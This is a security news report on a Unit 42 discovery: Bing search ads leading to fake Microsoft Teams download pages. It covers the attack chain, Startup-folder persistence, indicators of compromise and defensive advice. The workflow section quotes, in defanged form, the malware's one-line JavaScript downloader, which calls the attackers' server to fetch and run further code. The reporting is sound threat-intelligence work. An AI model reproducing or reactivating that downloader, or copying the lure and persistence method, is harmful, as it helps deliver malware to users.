Unit 42 researchers Bradley Duncan and Zach Diehl uncovered a malicious campaign exploiting Bing search advertisements to deliver malware through deceptive websites impersonating legitimate software pages.
This alarming discovery highlights the growing trend of attackers leveraging legitimate platforms for malicious purposes.
Malicious Bing Ad Campaign
The researchers detected a malicious ad in Bing search results on Wednesday, January 22, 2025.
.png
)
The ad redirected users to a fake Microsoft Teams download page, hosted on a domain under burleson-appliance[.]net, which had been registered just two days earlier, on January 20.
The campaign also targeted other popular software brands using similar tactics, with domains and subdomains designed to look authentic.
An analysis of the domains used in the campaign revealed their short-lived nature, a tactic used to evade detection. Sub-domains can be explored on threat analysis platforms like urlscan.
Attack Workflow
Users were redirected to a fraudulent Microsoft Teams page hosted at hxxps[:]//microsoft-teams-download.burleson-appliance[.]net, with another similar domain observed at hxxps[:]//microsoft.teams-live[.]com.
These fake sites prompted the download of a 72-byte JavaScript file named application_setup.js, which, though seemingly benign, served as a downloader for additional payloads.
The file, identified by the SHA256 hash 4bed34b1cd5663a5a857b3bbf81cc5413c61cb561e9a90067b57da08b01ae70b, contained the content: GetObject("scriptlet:hxxp[:]//5.252.153[.]241:80/api/file/get-file/264872");.
Upon execution via wscript.exe, the script connected to a command-and-control (C2) server at 5.252.153[.]241, where the infected host repeatedly contacted the server to retrieve additional malicious files, including PowerShell scripts, DLLs, and executable files.
Delivered payloads such as TeamViewer.exe and pas.ps1 were used collectively to establish persistence on the compromised system and execute further malicious actions.
The campaign established persistence by creating a shortcut in the Windows Startup directory.
For instance, a shortcut to TeamViewer.exe was added at C:\Users\[username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TeamViewer.lnk, ensuring the malicious program would execute each time the system started.
Technical Indicators
| Category | Details |
|---|---|
| C2 Server | 5.252.153[.]241 |
| Malicious Domains | – microsoft-teams-download.burleson-appliance[.]net |
| – microsoft.teams-live[.]com | |
| Key Files Delivered | TeamViewer.exe (4,380,968 bytes): Used as a persistence mechanism. |
| pas.ps1: Malicious PowerShell script for further exploitation. | |
| TV.dll and other DLL files: Designed to interact with the main payload. |
The abuse of Bing search ads to deliver malware underscores the need for heightened vigilance when clicking on ads, even on reputable platforms.
Cybersecurity professionals and users alike are urged to:
- Verify URLs before downloading applications.
- Avoid clicking on ads in search results when seeking software. Instead, navigate directly to official websites.
- Deploy endpoint detection and monitoring tools to identify and block unusual behaviors, such as unauthorized script execution or unexpected outbound connections.
This malicious advertising campaign demonstrates the sophistication of modern threat actors. By blending into trusted search engine platforms and mimicking well-known brands like Microsoft, attackers increase their chances of successfully deceiving users.
It is crucial for organizations and individuals to remain vigilant and implement layered security measures to defend against these evolving threats.
Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try for Free
